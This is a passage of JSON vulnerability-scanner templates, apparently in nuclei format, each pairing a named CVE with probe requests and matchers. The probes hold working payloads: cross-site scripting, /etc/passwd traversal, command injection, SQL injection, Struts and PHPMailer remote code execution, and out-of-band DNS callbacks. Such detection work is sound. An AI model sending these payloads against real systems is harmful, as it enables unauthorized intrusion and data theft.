Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/pondol-formmail/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Page Layout Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-Parsi Admin Font Editor","MW Font Changer"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Defa Online Image Protector"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WHIZZ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/scoreme/style"]}]},{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5674","info":{"name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id","{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, 'Debugging Center')","regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'Debugging Center')","contains(body_2, 'Windows IP')"],"condition":"and"}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WPSOLR Search Engine ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["S3 Video Plugin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["New Year Firework ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["anti plagiarism","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simpel Reserveren","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Hero Maps Pro ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Easy Contact Form Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-3010","info":{"name":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"word","part":"body","words":["<TITLE>master</TITLE>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-2449","info":{"name":"Apache Tomcat 4.x-7.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp","JSP Request Method"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46805","info":{"name":"Ivanti ICS - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1\nHost: {{Hostname}}\n","GET /api/v1/cav/client/status/../../admin/options HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"build\")","contains(body_1, \"system-information\")","contains(body_1, \"software-inventory\")","contains(header_1, \"application/json\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"poll_interval\")","contains(body_2, \"block_message\")","contains(header_2, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-34755","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-51467","info":{"name":"Apache OFBiz < 18.12.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-41265","info":{"name":"Qlik Sense Enterprise - HTTP Request Smuggling","severity":"critical"},"requests":[{"raw":["GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1\nHost: {{Hostname}}\nCookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337\nContent-Type: text/html\nContent-Length: 5\nTransfer-Encoding: chunked\n\n;\n\n"],"unsafe":true,"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(header, 'Bad Request')"],"condition":"and"}]}]},{"id":"CVE-2023-6895","info":{"name":"Hikvision IP ping.php - Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php/ping.php"],"body":"jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"payloads":{"command":["id","cmd /c ipconfig"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Windows IP","((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43374","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /hoteldruid/inizio.php HTTP/1.1\nHost: 